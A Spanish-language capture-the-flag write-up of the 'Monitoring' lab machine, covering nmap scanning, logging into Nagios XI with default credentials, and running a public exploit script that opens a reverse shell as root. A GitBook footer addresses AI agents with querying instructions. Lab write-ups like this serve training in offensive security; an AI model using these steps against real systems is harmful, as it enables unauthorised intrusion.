> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/proving-ground-play/monitoring.md). # Monitoring ### 🔍 **RECONOCIMIENTO** En primer lugar, tras conectarnos a la máquina, utilizamos el comando: ```bash ping -c 1 192.168.197.136 ``` para verificar la conectividad de red.

A continuación, se realiza el comando: ```bash nmap 192.168.197.136 ``` para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como se puede observar durante el escaneo, los siguientes puertos se encuentran abiertos: * **Puerto 22**, correspondiente al servicio **SSH**. * **Puerto 25**, correspondiente al servicio **SMTP**. * **Puerto 80**, correspondiente al servicio **HTTP**. * **Puerto 389**, correspondiente al servicio **LDAP**. * **Puerto 443**, correspondiente al servicio **HTTPS**. Dado que estos servicios están accesibles, se procederá a realizar un análisis más detallado sobre cada uno de ellos con el fin de identificar posibles vectores de ataque o configuraciones incorrectas. ### 🔎 **EXPLORACIÓN** Se utiliza el comando: ```bash sudo nmap -sCV -p22,25,80,389,443 -v 192.168.197.136 ``` para obtener más información sobre esos puertos específicamente.

Comprobamos el puerto 80.

Es una página de Nagios XI y al dar a acceder se nos muestra el panel de Login. Tras buscar las contraseñas por defecto nos logueamos (nagiosadmin:admin). {% embed url="" %}

Revisando la página encontramos una versión por lo que miramos a ver si tiene un exploit.

### 🚀 **EXPLOTACIÓN** Sí tiene exploit por lo que lo ejecutamos y así conseguimos una ejecución remota de código. {% embed url="" %} {% @github-files/github-code-block url="" %} Nos descargamos el exploit y lo ejecutamos. ```bash python3 exploit.py -t http://192.168.197.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh 192.168.45.157-lp 4444 ```

Mientras nos ponemos en escucha.

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/#) para trabajar más cómodos. ### 🔐 PRIVILEGIOS Al estar dentro y ejecutar: ```bash whoami ``` y sí somos **root**.

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/writeups/proving-ground-play/monitoring.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.